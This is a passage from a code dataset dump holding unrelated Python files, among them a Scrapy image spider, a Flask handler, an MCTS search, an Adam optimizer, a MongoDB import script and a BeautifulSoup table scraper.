main()\n","sub_path":"models/reg_test.py","file_name":"reg_test.py","file_ext":"py","file_size_in_byte":4748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"356512891","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/11/21 8:31\n# @Author : 海心\n# @Site : \n# @File : ImageSpider.py\n# @Software: PyCharm\n# @descri : 爬取图片下载\nimport json\n\nimport scrapy\n\nfrom ..items import MyImageItem\n\n\nclass ImgSpider(scrapy.Spider):\n name='img'\n index=0\n def start_requests(self):\n yield scrapy.Request(url='https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&word=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&fr=&expermode=&pn=0&rn=30&gsm=1e&1542695319470=')\n def parse(self, response):\n if self.index<=100:\n item=MyImageItem()\n image_urls=[]\n for data in json.loads(response.text)['data']:\n try:\n image_urls.append(data['thumbURL'])\n except:\n pass\n item['image_urls']=image_urls\n item['image_store']='第'+str(int(self.index/30)+1)+'页'\n yield item\n self.index+=30\n yield scrapy.Request('https://image.baidu.com/search/acjson?tn=resultjson_com&ipn=rj&ct=201326592&is=&fp=result&queryWord=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&cl=2&lm=-1&ie=utf-8&oe=utf-8&adpicid=&st=&z=&ic=&word=%E6%96%97%E5%9B%BE%E8%A1%A8%E6%83%85%E5%8C%85&s=&se=&tab=&width=&height=&face=&istype=&qc=&nc=&fr=&expermode=&pn='+str(self.index)+'&rn=30&gsm=1e&1542695319470=',meta={'test':'1'})\n","sub_path":"Pythonhomework/Scrapy/myspider/myspider/spiders/ImageSpider.py","file_name":"ImageSpider.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"453325658","text":"from setuptools import setup, find_packages\nimport svnversion\n\nrequires = ['WebError','mock', 'webtest', 'BeautifulSoup4','shortuuid','requests','zope.interface','zope.component']\n\nsetup(name='readable',\n version=svnversion.add_revision('0.0'),\n description='testing and assertion library',\n long_description='',\n classifiers=[\n \"Programming Language :: Python\",\n \"License :: Other/Proprietary License\",\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Topic :: Software Development :: Testing\",\n ],\n author='Jasper van den Bosch',\n author_email='jasper@ilogue.com',\n url='http://ilogue.com',\n keywords='',\n packages=find_packages(),\n namespace_packages = ['ilogue'],\n include_package_data=True,\n zip_safe=False,\n install_requires=requires,\n test_suite=\"ilogue.readable.tests.fast\",\n )\n\n## to run the slow test suite, execute\n# env/bin/python setup.py test -q --test-suite ilogue.readable.tests.slow\n\n","sub_path":"pypi_install_script/readable-0.0.post30.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"471914128","text":"from flask import jsonify, session\nfrom dao.choices import Choices\nfrom util.utilities import Utilities\n\n\nclass ChoicesHandler:\n\n @staticmethod\n def getAllChoices():\n try:\n choices = Choices.getChoices()\n result_list = []\n for choice in choices:\n result_list.append(Utilities.to_dict(choice))\n result = {\n \"message\": \"Success!\",\n \"choices\": result_list\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n\n @staticmethod\n def getChoicesById(cid):\n try:\n choice = Choices.getChoicesById(cid)\n choice_dict = Utilities.to_dict(choice)\n result = {\n \"message\": \"Success!\",\n \"choice\": choice_dict\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n\n @staticmethod\n def getChoicesByQuizId(qid):\n try:\n choices = Choices.getChoicesByQuizId(qid)\n result_list = []\n for choice in choices:\n result_list.append(Utilities.to_dict(choice))\n result = {\n \"message\": \"Success!\",\n \"choices\": result_list\n }\n return jsonify(result), 200\n except Exception as e:\n return jsonify(reason=\"Server error\", error=e.__str__()), 500\n \n \n\n\n\n \n\n ","sub_path":"backend/handler/choice.py","file_name":"choice.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86739983","text":"import csv\nimport time\n\ndef stream_messages():\n csv_filename = \"./dataset/sensors.csv\"\n with open(csv_filename, \"r\") as dataset:\n row = csv.reader(dataset, delimiter=\",\")\n for i, data in enumerate(row):\n msg = dict(id=data[0],\n sensor1=data[1],\n sensor2=data[2],\n sensor3=data[3],\n sensor4=data[4])\n yield msg\n time.sleep(.01)\n\nif __name__ =='__main__':\n ans = stream_messages()\n for data in ans:\n print(data)\n\n","sub_path":"bidirection_databroker/k.py","file_name":"k.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"198344571","text":"class emp:\n obj_count=0\n def __init__(self,emp_id,salary,desig):\n self.emp_id=emp_id\n self.salary=salary\n self.desig=desig\n emp.obj_count+=1\n\n def display_emp(self):\n print('Employee ID: '+self.emp_id, '\\nSalary: '+self.salary,'\\nDesignation: '+self.desig)\n\n def showobjcount(self):\n print(\"Total Number of Employee %d\" % emp.obj_count)\n\nclass detail(emp):\n def __init__(self,name,address):\n self.name=name\n self.address=address\n emp.obj_count+=1\n\n def display_emp(self):\n print('Employee ID: '+self.emp_id, '\\nName: '+self.name,'\\nDesignation: '+self.desig, '\\nSalary: '+self.salary,'\\nAddress: '+self.address)\n\nd=detail\nd.display_emp\nemp1=emp\n#emp1=emp()\nemp2=emp('KSPLI101','ABC','Noida')\nemp3=emp('KSPLI102','DEF','Pune')\nemp4=emp('KSPLI103','GHI','Agra')\n\nd.display_emp('KSPLI100','XYZ','Delhi')\nprint('\\n')\nemp2.display_emp()\nprint('\\n')\nemp3.display_emp()\nprint('\\n')\nemp4.display_emp()\nprint('\\n')\nprint('Total Employee: %d' % emp.obj_count)\n","sub_path":"classemp.py","file_name":"classemp.py","file_ext":"py","file_size_in_byte":986,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"587590671","text":"# agent avatar module\n\nimport cv2\nfrom tkinter import *\nfrom tkStyle import *\nfrom tkinter import ttk\nimport PIL.Image\nimport PIL.ImageTk\n\nfrom avatar_util import Avatar\nfrom avatar_util import Avatar_state\nfrom avatar_util import video_paths as vp\n\n# Avatar widget\nclass Avatar_widget:\n # Constructor\n # Automatically set initial state to neutral\n def __init__(self, parent_frame, max_width = 200, max_height = 150):\n self.avatar_str = StringVar()\n self.state_str = StringVar()\n self.parent_frame = parent_frame\n #Start in neutral state\n self.avatar_str.set(Avatar.FEMALE.value)\n self.state_str.set(Avatar_state.NEUTRAL.value)\n self.curr_avatar = Avatar(self.avatar_str.get())\n self.curr_state = Avatar_state(self.state_str.get())\n # initialize comboboxes\n self.avatar_box = ttk.Combobox(parent_frame, textvariable = self.avatar_str,\n background=StColors.light_grey, foreground=StColors.dark_blue)\n self.avatar_box['values'] = [a.value for a in Avatar]\n self.avatar_box['state'] = \"readonly\"\n self.avatar_box.bind(\"<>\", self.update_model_event)\n self.state_box = ttk.Combobox(parent_frame, textvariable = self.state_str,\n background=StColors.light_grey, foreground=StColors.dark_blue)\n self.state_box['values'] = [a.value for a in Avatar_state]\n self.state_box['state'] = \"readonly\"\n self.state_box.bind(\"<>\", self.update_state_event)\n # initialize video object\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state])\n # save max size params\n self.max_width = max_width\n self.max_height = max_height\n # create canvas\n self.canvas = Canvas( parent_frame, width=max_width, height=max_height)\n self.canvas.pack()\n \n # After it is called once, update method will automatically repeat\n self.delay = 15\n self.update()\n \n # Accessor method for state variable. Returns StringVar objects\n def get_state_var(self):\n return self.avatar_str, self.state_str\n\n # Generate an event in the parent frame\n # Only call after state is changed through GUI.\n def update_state_event(self, event):\n self.parent_frame.event_generate(\"<>\", when=\"tail\")\n\n def update_model_event(self, event):\n self.parent_frame.event_generate(\"<>\", when=\"tail\")\n\n # Make state control comboboxes visible\n # This method should be called when wizard state is established\n def reveal_controls(self):\n self.avatar_box.pack(side=LEFT)\n self.state_box.pack()\n\n # Returns the size of a scaled down version of the \n # video to fit in the canvas\n # size = (width, height)\n def scale(self, size):\n s = min(self.max_width/size[0],self.max_height/size[1])\n return (int(size[0]*s),int(size[1]*s))\n\n # Update method to check for state updates\n # and choose next frame to display\n def update(self):\n # check for state updates\n state_update = False\n try:\n old_avatar = self.curr_avatar\n old_state = self.curr_state\n self.curr_avatar = Avatar(self.avatar_str.get().lower())\n self.curr_state = Avatar_state(self.state_str.get().lower())\n state_update = old_avatar != self.curr_avatar or old_state != self.curr_state\n except ValueError:\n pass\n # if state is updated, re-initialize Avatar_capture object\n if state_update:\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state]) \n ret, frame = self.vid.get_frame()\n # if get_frame failed, might be end of video so restart.\n if not ret:\n self.vid = Avatar_capture(vp[self.curr_avatar][self.curr_state])\n ret, frame = self.vid.get_frame()\n if ret:\n im = PIL.Image.fromarray(frame)\n im.thumbnail(self.scale(im.size))\n self.photo = PIL.ImageTk.PhotoImage(image = im)\n self.canvas.create_image(0,0, image=self.photo, anchor = NW)\n\n self.parent_frame.after(self.delay, self.update)\n\nclass Avatar_capture:\n def __init__(self, video_source):\n self.vid = cv2.VideoCapture(video_source)\n if not self.vid.isOpened():\n raise ValueError(\"Unable to open avatar video source\", video_source)\n self.width = self.vid.get(cv2.CAP_PROP_FRAME_WIDTH)\n self.height = self.vid.get(cv2.CAP_PROP_FRAME_HEIGHT)\n\n def get_frame(self):\n if self.vid.isOpened():\n ret, frame = self.vid.read()\n if ret:\n # Return a boolean success flag and the current frame converted to BGR\n return (ret, cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n else:\n return (ret, None)\n else:\n return (ret, None)\n\n def __del__(self):\n if self.vid.isOpened():\n self.vid.release()\n\n# Demo of avatar widget\n\nif __name__ == \"__main__\":\n\n root = Tk()\n root.title(\"Test Avatar\")\n a_frame = ttk.Frame(root)\n avatar = Avatar_widget(a_frame,1000,600) \n avatar.reveal_controls()\n a_frame.pack()\n\n\n root.mainloop()\n","sub_path":"avatar.py","file_name":"avatar.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"402078915","text":"import math\nimport numpy as np\n\nclass mcts():\n def __init__(self, game, nnet):\n self.game = game\n self.nnet = nnet\n self.Qsa = {}\n self.Nsa = {}\n self.Ns = {}\n self.Ps = {}\n self.Es = {}\n self.Vs = {}\n\n def getactionprob(self, oneminusone, temp=1):\n for i in range(100):\n self.search(oneminusone)\n\n s = self.game.stringstring(oneminusone)\n counts = [self.Nsa[(s, a)] if (s, a) in self.Nsa else 0 for a in range(self.game.actionsize())]\n\n if temp == 0:\n bestA = int(np.argmax(counts))\n probs = [0] * len(counts)\n probs[bestA] = 1\n return probs\n\n counts = [x**(1. / temp) for x in counts]\n probs = [x / float(sum(counts)) for x in counts]\n return probs\n\n def search(self, oneminusone):\n s = self.game.stringstring(oneminusone)\n\n if s not in self.Es:\n self.Es[s] = self.game.ggeutnam(oneminusone, 1)\n if self.Es[s] != 0:\n return -self.Es[s]\n\n if s not in self.Ps:\n # leaf node\n self.Ps[s], v = self.nnet.predict(oneminusone)\n valids = self.game.validmove(oneminusone, 1)\n self.Ps[s] = self.Ps[s] * valids # masking invalid moves\n sum_Ps_s = np.sum(self.Ps[s])\n if sum_Ps_s > 0:\n self.Ps[s] /= sum_Ps_s # renormalize\n else:\n print(\"All valid moves were masked, do workaround.\")\n self.Ps[s] = self.Ps[s] + valids\n self.Ps[s] /= np.sum(self.Ps[s])\n\n self.Vs[s] = valids\n self.Ns[s] = 0\n return -v\n\n valids = self.Vs[s]\n cur_best = -float('inf')\n best_act = -1\n\n for a in range(self.game.actionsize()):\n if valids[a]:\n if (s, a) in self.Qsa:\n u = self.Qsa[(s, a)] + 5 * self.Ps[s][a] * math.sqrt(self.Ns[s]) / (1 + self.Nsa[(s, a)])\n else:\n u = 5 * self.Ps[s][a] * math.sqrt(self.Ns[s] + 1e-8) # Q = 0 ?\n\n if u > cur_best:\n cur_best = u\n best_act = a\n\n a = best_act\n next_s, next_player = self.game.nextstate(oneminusone, 1, a)\n next_s = self.game.oneminusone(next_s, next_player)\n\n v = self.search(next_s)\n\n if (s, a) in self.Qsa:\n self.Qsa[(s, a)] = (self.Nsa[(s, a)] * self.Qsa[(s, a)] + v) / (self.Nsa[(s, a)] + 1)\n self.Nsa[(s, a)] += 1\n\n else:\n self.Qsa[(s, a)] = v\n self.Nsa[(s, a)] = 1\n\n self.Ns[s] += 1\n return -v\n\n","sub_path":"mcts.py","file_name":"mcts.py","file_ext":"py","file_size_in_byte":2669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"502816852","text":"import _init_paths\nfrom scorenet import ScoreNet\nfrom keras.utils import np_utils\nfrom config import *\nimport numpy as np\nimport coder\nimport time\nimport cv2\nimport threading\nimport tensorflow as tf \n\n# img_dir = '../img/scorenet/video6_frame090.bmp'\n# Tensorflow graph object\ngraph = tf.get_default_graph()\n# Camera capture related variable\ncap = None\nis_cap_open = False\n\n# model object\nscoring_model = None\n\n# break variable and timer to calculate fps\nframe_index = 0\ntimer = 0.0\nfps_index = 0\n\n# ---------------------------------------------------------------\n# Image objects and predict result\n# ---------------------------------------------------------------\n# 1st\nframe_fetch = None\n\n# 2nd\nframe_process = None\nresult_scoring = None\n\n# 3rd\nshow_frame = None\nscoring_input = None\n\n# scoring_true = np_utils.to_categorical(np.load('../label.npy'),5)\n\nclass fetchImgThread(threading.Thread):\n \"\"\"\n The thread to fetch the image in each duration\n \"\"\"\n def __init__(self):\n threading.Thread.__init__(self)\n\n def start(self):\n threading.Thread.__init__(self)\n threading.Thread.start(self)\n \n def join(self, _sec):\n threading.Thread.join(self, _sec)\n\n def run(self):\n global cap\n global is_cap_open\n global frame_fetch\n _, frame = cap.read()\n is_cap_open = _\n frame_fetch = cv2.resize(frame, (480, 270))\n\nclass deepThread(threading.Thread):\n \"\"\"\n The thread to do the segmentation and classification\n \"\"\"\n def __init__(self):\n threading.Thread.__init__(self)\n\n def start(self):\n threading.Thread.__init__(self)\n threading.Thread.start(self)\n\n def join(self, _sec):\n threading.Thread.join(self, _sec)\n\n def run(self):\n global segment_model\n global frame_process\n global result_segment\n global result_scoring\n global graph\n global sess\n global frame_index\n\n with graph.as_default():\n # x_test = np.expand_dims(frame_process, axis=0)\n if frame_index % 3 == 0 and frame_process.any():\n result_scoring = scoring_model.test(\n np.expand_dims(frame_process, 0)\n ) \n \n# # Test\nif __name__ == '__main__':\n \n scoring_model = ScoreNet(save_path='../model/scorenet.h5')\n # scoring_model.compile()\n # cap = cv2.VideoCapture('../video/1.mp4')\n cap = cv2.VideoCapture(video_name) \n\n fetch_thread = fetchImgThread()\n deep_thread = deepThread()\n \n fetch_thread.start()\n fetch_thread.join(1)\n # Pass the input object and clean the previous status\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n \n # Grab 2nd frame\n fetch_thread.start()\n deep_thread.start()\n fetch_thread.join(5)\n deep_thread.join(5)\n \n show_frame = np.copy(frame_process)\n scoring_input = np.copy(result_scoring)\n result_scoring = None\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n \n while cap.isOpened():\n _time = time.time()\n\n fetch_thread.start()\n deep_thread.start()\n fetch_thread.join(5)\n deep_thread.join(5)\n cv2.imshow('test',frame_process)\n cv2.imshow('scoring', coder.decodeByVector(show_frame, scoring_input))\n \n # Pring fps\n if timer > 1.0:\n print (\"fps: \", fps_index / timer)\n fps_index = 0\n timer = 0\n\n # judge if we want to break\n if (cv2.waitKey(1) & 0xFF == ord('q')):\n break\n# if not unicode(video_name).isnumeric():\n# if frame_index > break_frame_index:\n# break\n\n # Pass the input object and clean the previous status\n show_frame = np.copy(frame_process)\n scoring_input = np.copy(result_scoring)\n # print('Scoring:',scoring_input)\n # loss,accuracy = scoring_model.evaluate(scoring_true,scoring_input)\n # print('test loss: ', loss)\n # print('test accuracy: ', accuracy)\n\n # Clear the scoring result if predict ScoreNet in next frame\n if frame_index % 3 == 2:\n result_scoring = None\n frame_process = np.copy(frame_fetch)\n frame_fetch = None\n\n # Update fps computation variable\n frame_index += 1\n fps_index += 1\n timer += (time.time() - _time)\n \n cap.release()\n \n # model = ScoreNet(save_path='../model/scorenet.h5')\n # x_test = np.expand_dims(cv2.imread(img_dir), axis=0)\n # _time = time.time()\n # prediction = model.test(x_test)\n # print ('time comsumption: ', time.time() - _time)\n # # Show the test result\n # prediction = prediction.astype(int)\n\n # res = coder.decodeByVector(x_test[0], prediction)\n # cv2.imshow('show', res)\n # cv2.waitKey(0)\n\n","sub_path":"test/scorenet_test.py","file_name":"scorenet_test.py","file_ext":"py","file_size_in_byte":4833,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"85896847","text":"\"\"\"\"\nLesson 5. Create DB using mongodb api\n\"\"\"\n\n# pylint: disable= W1203, R0914, C0103, W0703, W0612, R0201\nimport logging\nimport csv\nimport os\nimport time\nfrom pymongo import MongoClient # high level api\n\n\nLOG_FORMAT = \"%(asctime)s %(filename)s:%(lineno)-3d %(levelname)s %(message)s\"\nFORMATTER = logging.Formatter(LOG_FORMAT)\n\nFILE_HANDLER = logging.FileHandler('db.log')\nFILE_HANDLER.setLevel(logging.INFO)\nFILE_HANDLER.setFormatter(FORMATTER)\n\nLOGGER = logging.getLogger()\nLOGGER.setLevel(logging.INFO)\nLOGGER.addHandler(FILE_HANDLER)\n\n\nclass MongoDBConnection():\n \"\"\"\n Class to start MongoDB Connection\n \"\"\"\n\n def __init__(self, host='127.0.0.1', port=27017):\n \"\"\" be sure to use the ip address not name for local windows\"\"\"\n self.host = host\n self.port = port\n self.connection = None\n\n def __enter__(self):\n self.connection = MongoClient(self.host, self.port)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.connection.close()\n\n\ndef get_time(func):\n '''\n method to get time for each function\n '''\n def calc_time(*args, **kwargs):\n start = time.time()\n results = func(*args, **kwargs)\n total_time = time.time() - start\n with open(\"timings.txt\", \"a+\") as file:\n file.write(f'{func.__name__} took {total_time} seconds to run\\n')\n return results\n return calc_time\n\n\nclass Timed(type):\n \"\"\" Meta class to add timing \"\"\"\n def __new__(cls, clsname, bases, clsdict):\n for name, value in clsdict.items():\n if callable(value):\n clsdict[name] = get_time(value)\n\n return super(Timed, cls).__new__(cls, clsname, bases, clsdict)\n\n\nclass database(metaclass=Timed):\n '''\n class to make database and add data to it\n '''\n def import_data(\n self,\n directory_name,\n product_file,\n customer_file,\n rentals_file):\n \"\"\"\n method to import the csv files that will be added to the db\n \"\"\"\n LOGGER.info(\"starting MongoDBConnection\")\n mongo = MongoDBConnection()\n\n with mongo:\n\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n\n # collection in database\n products = db[\"products\"]\n customers = db[\"customers\"]\n rentals = db[\"rentals\"]\n db.products.drop()\n db.customers.drop()\n db.rentals.drop()\n\n LOGGER.info(\"importing data\")\n product_ip = database.read_data(self, directory_name, product_file)\n customer_ip = database.read_data(\n self, directory_name, customer_file)\n rentals_ip = database.read_data(self, directory_name, rentals_file)\n\n product_results = database.add_many_ip(self, products, product_ip)\n customer_results = database.add_many_ip(\n self, customers, customer_ip)\n rental_results = database.add_many_ip(self, rentals, rentals_ip)\n\n import_count = (\n db.products.count_documents({}),\n db.customers.count_documents({}),\n db.rentals.count_documents({})\n )\n\n LOGGER.info(f'succesful product imports = {import_count[0]} to db')\n LOGGER.info(f'succesful customer imports = {import_count[1]} to db')\n LOGGER.info(f'succesful rental imports = {import_count[2]} to db')\n\n error_count = (product_results, customer_results, rental_results)\n LOGGER.info(f'product import errors = {error_count[0]} to db')\n LOGGER.info(f'customer import errors = {error_count[1]} to db')\n LOGGER.info(f'rental import errors = {error_count[2]} to db')\n\n return import_count, error_count\n\n def read_data(self, directory_name, file_name):\n \"\"\"\n method to read in the csv files\n \"\"\"\n LOGGER.info(f'reading {file_name} data from {directory_name}')\n ip_list = []\n\n try:\n with open(directory_name + file_name) as csv_file:\n reader = csv.reader(csv_file)\n header = next(reader, None)\n header[0] = header[0].replace(\"\\ufeff\", \"\")\n\n for row in reader:\n temp_dict = {}\n for index, value in enumerate(header):\n temp_dict[value] = row[index]\n ip_list.append(temp_dict)\n LOGGER.info(\"successfully read in data\")\n\n except Exception as error:\n LOGGER.info(f'could not read data due to {error}')\n\n return ip_list\n\n def add_many_ip(self, collection_name, collection_ip):\n \"\"\"\n method to add the data to the collection\n \"\"\"\n\n try:\n collection_name.insert_many(collection_ip)\n LOGGER.info(f'no errors importing to {collection_name} ')\n error = 0\n return error\n except Exception as error:\n LOGGER.info(\n f'add_many_ip error of {error} for to {collection_name}')\n error = 1\n return error\n\n def show_available_products(self):\n \"\"\"\n Method to show available products\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting show_available_products method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n avail_products_dict = {}\n query = {'quantity_available': {'$gt': '1'}}\n for query_results in db.products.find(query):\n key = query_results[\"product_id\"]\n values = {\n \"description\": query_results[\"description\"],\n \"product_type\": query_results[\"product_type\"],\n \"quantity_available\": query_results[\"quantity_available\"]\n }\n temp_dict = {key: values}\n avail_products_dict.update(temp_dict)\n LOGGER.info(f'available products = {avail_products_dict}')\n return avail_products_dict\n\n def show_rentals(self, product_id):\n \"\"\"\n Method to show available products\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting show_rentals method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n show_rentals_dict = {}\n query = {'product_id': product_id}\n for query_results in db.rentals.find(query):\n query_2 = {'user_id': query_results['user_id']}\n for query_results_2 in db.customers.find(query_2):\n key = query_results_2['user_id']\n value = {\n 'name': query_results_2['name'],\n 'address': query_results_2['address'],\n 'phone_number': query_results_2['phone_number'],\n 'email': query_results_2['email']\n }\n temp_dict = {key: value}\n show_rentals_dict.update(temp_dict)\n LOGGER.info(\n f'showing rentals that match \"{product_id}\" = {show_rentals_dict}')\n\n return show_rentals_dict\n\n def drop_data(self):\n \"\"\"\n method to drop the data from db\n \"\"\"\n mongo = MongoDBConnection()\n LOGGER.info(\"starting drop data method\")\n with mongo:\n # mongodb database; it all starts here\n db = mongo.connection.HPNorton\n db.products.drop()\n db.customers.drop()\n db.rentals.drop()\n\n\ndef main():\n \"\"\"\n main used to call other methods\n \"\"\"\n cwd = os.path.abspath(os.path.join(os.path.dirname(__file__)))\n db = database()\n import_count, error_count = db.import_data(\n cwd + \"/\", \"product.csv\", \"customers.csv\", \"rental.csv\")\n db.show_available_products()\n db.show_rentals(\"prd002\")\n db.drop_data()\n db2 = database()\n import_count, error_count = db2.import_data(\n cwd + \"/\", \"product.1.csv\", \"customers.1.csv\", \"rental.1.csv\")\n db2.show_available_products()\n db2.show_rentals(\"prd002\")\n db2.drop_data()\n db3 = database()\n import_count, error_count = db3.import_data(\n cwd + \"/\", \"product.2.csv\", \"customers.2.csv\", \"rental.2.csv\")\n db3.show_available_products()\n db3.show_rentals(\"prd002\")\n db3.drop_data()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/Daniel_Carrasco/lesson10/assignment/src/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":8495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"64085383","text":"import numpy as np\n# SOURCE: https://www.deeplearning.ai/deep-learning-specialization/\ndef initialize_adam(parameters,num_layers) :\n \"\"\"\n Initializes m and v as two python dictionaries with:\n - keys: \"dW1\", \"db1\", ..., \"dWL\", \"dbL\" \n - values: numpy arrays of zeros of the same shape as the corresponding gradients/parameters.\n \n Arguments:\n parameters -- python dictionary containing your parameters.\n parameters[\"W\" + str(l)] = Wl\n parameters[\"b\" + str(l)] = bl\n \n Returns: \n m -- python dictionary that will contain the exponentially weighted average of the gradient.\n v[\"dW\" + str(l)] = ...\n v[\"db\" + str(l)] = ...\n v -- python dictionary that will contain the exponentially weighted average of the squared gradient.\n s[\"dW\" + str(l)] = ...\n s[\"db\" + str(l)] = ...\n \"\"\"\n L = len(parameters) // num_layers # number of layers in the neural networks\n m = {} # first moment vector\n v = {} # second moment vector\n # Initialize m, v. Input: \"parameters\". Outputs: \"v, s\".\n for l in range(L):\n m[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l+1)])\n m[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l+1)])\n v[\"dW\" + str(l+1)] = np.zeros_like(parameters[\"W\" + str(l+1)])\n v[\"db\" + str(l+1)] = np.zeros_like(parameters[\"b\" + str(l+1)])\n return m, v\ndef update_parameters_with_adam(parameters,num_layers, grads, m, v, t, learning_rate = 0.01,\n beta1 = 0.9, beta2 = 0.999, epsilon = 1e-8):\n \"\"\"\n Update parameters using Adam\n \n Arguments:\n parameters -- python dictionary containing your parameters:\n parameters['W' + str(l)] = Wl\n parameters['b' + str(l)] = bl\n grads -- python dictionary containing your gradients for each parameters:\n grads['dW' + str(l)] = dWl\n grads['db' + str(l)] = dbl\n m -- Adam variable, moving average of the first gradient, python dictionary\n v -- Adam variable, moving average of the squared gradient, python dictionary\n learning_rate -- the learning rate, scalar.\n beta1 -- Exponential decay hyperparameter for the first moment estimates \n beta2 -- Exponential decay hyperparameter for the second moment estimates \n epsilon -- hyperparameter preventing division by zero in Adam updates\n Returns:\n parameters -- python dictionary containing your updated parameters \n m -- Adam variable, moving average of the first gradient, python dictionary\n v -- Adam variable, moving average of the squared gradient, python dictionary\n \"\"\"\n L = len(parameters) // num_layers # number of layers in the neural networks\n m_corrected = {} # Initializing first moment estimate, python dictionary\n v_corrected = {} # Initializing second moment estimate, python dictionary\n # Perform Adam update on all parameters\n for l in range(L):\n # Moving average of the gradients. Inputs: \"m, grads, beta1\". Output: \"m\".\n m[\"dW\" + str(l+1)] = beta1 * m[\"dW\" + str(l+1)] + (1 - beta1) * grads[\"dW\" + str(l+1)]\n m[\"db\" + str(l+1)] = beta1 * m[\"db\" + str(l+1)] + (1 - beta1) * grads[\"db\" + str(l+1)]\n # Compute bias-corrected first moment estimate. Inputs: \"m, beta1, t\". Output: \"m_corrected\".\n m_corrected[\"dW\" + str(l+1)] = m[\"dW\" + str(l+1)] / (1 - np.power(beta1,t))\n m_corrected[\"db\" + str(l+1)] = m[\"db\" + str(l+1)] / (1 - np.power(beta1,t))\n # Moving average of the squared gradients. Inputs: \"v, grads, beta2\". Output: \"v\".\n v[\"dW\" + str(l+1)] = beta2 * v[\"dW\" + str(l+1)] + (1 - beta2) * np.power(grads[\"dW\" + str(l+1)],2)\n v[\"db\" + str(l+1)] = beta2 * v[\"db\" + str(l+1)] + (1 - beta2) * np.power(grads[\"db\" + str(l+1)],2)\n # Compute bias-corrected second raw moment estimate. Inputs: \"v, beta2, t\". Output: \"v_corrected\".\n v_corrected[\"dW\" + str(l+1)] = v[\"dW\" + str(l+1)] / (1 - np.power(beta2,t))\n v_corrected[\"db\" + str(l+1)] = v[\"db\" + str(l+1)] / (1 - np.power(beta2,t))\n # Update parameters. Inputs: \"parameters, learning_rate, m_corrected, v_corrected, epsilon\". Output: \"parameters\".\n parameters[\"W\" + str(l+1)] = parameters[\"W\" + str(l+1)] - learning_rate * m_corrected[\"dW\" + str(l+1)] / (np.sqrt(v_corrected[\"dW\" + str(l+1)]) + epsilon)\n parameters[\"b\" + str(l+1)] = parameters[\"b\" + str(l+1)] - learning_rate * m_corrected[\"db\" + str(l+1)] / (np.sqrt(v_corrected[\"db\" + str(l+1)]) + epsilon)\n return parameters, m, v","sub_path":"autonomous_driving/challenge/Adam1.py","file_name":"Adam1.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"537205650","text":"import requests\nfrom bs4 import BeautifulSoup as bs\nimport os\nimport pandas as pd\n\ndef scrape_data(url):\n site=requests.get(url).text\n soup=bs(site,'lxml')\n #s=soup.prettify()\n table=soup.find('div',class_='table-responsive').find('table',class_='table table-hover table-condensed')\n headers = []\n for i in table.find_all('th'):\n title = i.text\n headers.append(title)\n row_data=[] \n for j in table.find_all('tr'): \n row_temp=[]\n for k in j.find_all('td'):\n row_temp.append(k.text)\n row_data.append(row_temp)\n \n df = pd.DataFrame(columns = headers,data=row_data)\n df.to_csv(os.path.join('population.csv'))\n print(df.shape)\n \nurl=\"https://www.worldometers.info/world-population/world-population-projections/\" \nscrape_data(url)\n \n# from requests import Session\n# from bs4 import BeautifulSoup as bs\n \n# with Session() as s:\n# site = s.get(\"http://quotes.toscrape.com/login\")\n# bs_content = bs(site.content, \"html.parser\")\n# #print(bs_content)\n# token = bs_content.find(\"input\", {\"name\":\"csrf_token\"})[\"value\"]\n# login_data = {\"username\":\"admin\",\"password\":\"12345\", \"csrf_token\":token}\n# s.post(\"http://quotes.toscrape.com/login\",login_data)\n# home_page = s.get(\"http://quotes.toscrape.com\")\n# print((home_page.content))\n\n# import 